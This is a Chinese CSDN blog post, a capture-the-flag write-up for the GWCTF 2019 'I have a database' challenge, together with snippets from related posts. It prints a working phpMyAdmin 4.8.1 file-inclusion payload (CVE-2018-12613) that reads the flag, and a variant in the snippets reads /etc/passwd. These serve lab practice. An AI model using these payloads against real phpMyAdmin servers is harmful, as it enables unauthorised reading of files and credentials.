[GWCTF 2019]我有一个数据库

最新推荐文章于 2023-01-29 00:09:53 发布
最新推荐文章于 2023-01-29 00:09:53 发布
阅读量138 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51019270/article/details/114793815
版权

[GWCTF 2019]我有一个数据库 WP

这道题主要考察的是一个对phpmyadmin 4.8.2& 4.8.1 版本的特有漏洞的了解。

先看题

进去以后是一堆乱码,用御剑去扫一波

http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txt
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.php
http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/config.inc.php

扫出来这么几个文件

访问phpmyadmin看一眼
在这里插入图片描述

php的版本是4.8.1,4.8.2和4.8.1的php版本都有一个漏洞,都存在着远程文件读取漏洞

直接上payload去访问就行

index.php?target=db_sql.php%253f/../../../../../../../../flag

在这里插入图片描述
关于phpmyadmin的漏洞的相关知识点在这里
文件包含漏洞

whitehousezx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GWCTF 2019]我有一个数据库(文件包含漏洞)
weixin_44110537的博客
10-03 406
一堆乱码,什么都没有. 查看源代码也没有什么隐藏信息. 于是dirsearch扫描一下,发现 有个数据库登入页面. 发现不用登录直接就可以进去了. 但是发现这里面什么都没有. cve-2018-12613-PhpMyadmin后台文件包含 这个漏洞出现在index.php中的 // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_st.
BUU刷题--[GWCTF 2019]我有一个数据库
weixin_48631429的博客
12-02 551
我有一个数据库 打开看到这样一堆文字,读不懂,也没有其他的信息。 怎么想也想不到该怎么做,buu还不能扫描。所以只能看了wp,看到有一个/phpmyadmin,回来开始想怎么做 phpmyadmin版本信息4.8.1,搜索一下有什么漏洞。 任意文件包含:那么我们就可以利用来读flag ?target=db_datadict.php%253f/../../../../../../../../../flag 拿到flag 考点就是CVE-2018-12613 ...
[GWCTF 2019]我有一个数据库 wp
m0_55185160的博客
04-23 4339
得到了/phpmyadmin/路径,加上题目是我有一个数据库,于是想到应该本题就是和phpmyadmin数据库有关 我们可以看到phpmyadmin的版本为4.8.1,搜索后发现这个版本的phpmyadmin存在漏洞CVE-2018-12613,下面我们复现一下漏洞。 首先分析一下源码: index.php 关于target的部分 $target_blacklist = array ( 'imp..
[GWCTF 2019]我有一个数据库&&getshell
plant1234的博客
03-24 2750
BUU我有一个数据库&&getsholl 做这题的话目的是为了复现 phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞 这题的话打开看是乱码,但查看响应还是有东西的: 多的不说先信息收集一波,直接扫目录,看页面有没有有用的信息 然后。 日常访问有没有:robots.txt 得到: 在发现有phpinfo.php 访问得到: 得到了后端脚本语言php的一些信息 扫描得到: 扫描发现有:phpmyadmin/ 直接访问得到: 发现没有要登陆省去了很多的步骤 尝试用
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
记录学习,一起进步
01-29 269
[GWCTF 2019]我有一个数据库(CVE-2018-12613)
DES加密、DES解密、AES加密、AES解密
06-26
个人例子,VS2013,DES加密、DES解密,AES加密,AES解密,
el函数的使用文档
07-09
该文档主要包括一些el函数的简单使用说明.
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 591
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
TCP/IP详解
weixin_30702413的博客
04-13 196
TCP和UDP处在同一层---运输层,但是TCP和UDP最不同的地方是,TCP提供了一种可靠的数据传输服务,TCP是面向连接的,也就是说,利用TCP通信的两台主机首先要经历一个“拨打电话”的过程,等到通信准备结束才开始传输数据,最后结束通话。所以TCP要比UDP可靠的多,UDP是把数据直接发出去,而不管对方是不是在收信,就算是UDP无法送达,也不会产生ICMP差错报文,这一经时重申了很多...
搭建WCF(TCP)服务过程中遇到的各种问题
梦の源地
01-27 1348
吐槽一下:就一个简单的搭建TCP服务,结果在客户端引用的时候碰见各种问题,同事评价说“几乎常碰见的问题你都碰见了。。”就为解决这些问题,花费了1个多星期(请不要吐槽菜鸟的效率),在要崩溃的时候终于成功跑通了,这是一个很让你兴奋的事情。。在这里总结一下吧,最少让这段时间没有白白浪费。还有就是调试很重要,Try……Catch…帮了大忙1.在 ServiceModel 客户端配置部分中,找不到引用协定“W
短信发送接口被恶意访问的网络攻击事件(四)完结篇--搭建WAF清理战场
Elinor2017的博客
07-03 316
作者:13 GitHub:https://github.com/ZHENFENG13 版权声明:本文为原创文章,未经允许不得转载。 前言 短信发送接口被恶意访问的网络攻击事件(一)紧张的遭遇战险胜 短信发送接口被恶意访问的网络攻击事件(二)肉搏战-阻止恶意请求 短信发送接口被恶意访问的网络攻击事件(三)定位恶意IP的日志分析脚本 以上三篇文章详细的介绍了事件的起因和经过,回顾了一下整...
TCP 报文格式及TCP Flags
热门推荐
gyunling的专栏
04-16 3万+
(一)前言 TCP 是一个基于连接的四层协议,提供全双工地,可靠地传输系统。它能够保证数据被远程主机接收。并且能够为高层协议提供flow-controlled 服务。 (二)TCP 报文格式(rfc793) 各个Field说明: 源端口(Source Port):长度为16 bits(2个字节)。源端口。 目的端口(Destination Port):长...
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
网安小趴菜
09-20 597
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
[GWCTF 2019]我有一个数据库&CVE-2018-12613
qq_43801002的博客
04-27 749
#两道题用的都是]CVE-2018-12613这一个洞,所以就给写一起了。 1.审下源码吧 问题在index.php的55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['targ...
[GWCTF 2019] web题-我有一个数据库
BROTHERYY的博客
07-30 1763
复现环境:buuoj.cn 我是从题目猜到有phpmyadmin,直接就输入就进去了 看一下版本信息 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 能够执行,修改为flag flag{15aa1a13-8298-433c-8139-4ff6a0ffb5d6} ...
[GWCTF 2019]我有一个数据库 1
qq_43618536的博客
07-21 666
[GWCTF 2019]我有一个数据库 1
[ACTF2020 新生赛]Include
weixin_51019270的博客
01-24 531
[ACTF2020 新生赛]Include WP 打开网页只有一个tips[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3GBbFPiS-1611478636306)(C:\Users\32532\Pictures\wp\Snipaste_2021-01-24_15-47-37.png)] 然后点击 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4hGAvTAq-1611478636308)(C:\Users\32532\AppData\Roa
NSCTF-misc-writeup
Brucetg的博客
07-22 4616
Misc:     Kungfu   打开压缩包,里面有一张png后缀的图片,因为分比较低,感觉是套路题,直接winhex打开查看,在文件末尾发现提示:     尝试base64解码:     尝试凯撒和栅栏解密都不行,还以为是思路错误,后来队友提示后面加一个空格试试,顺利得到flag:                          
[GWCTF2019]huyao
最新发布
07-28
\[GWCTF2019\]huyao是一个CTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,它可能涉及到频域盲水印隐写。具体的解题方法和细节需要参赛者在比赛中进行分析和解决。 #### 引用[.reference_title] - *1* [BUUCTF ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值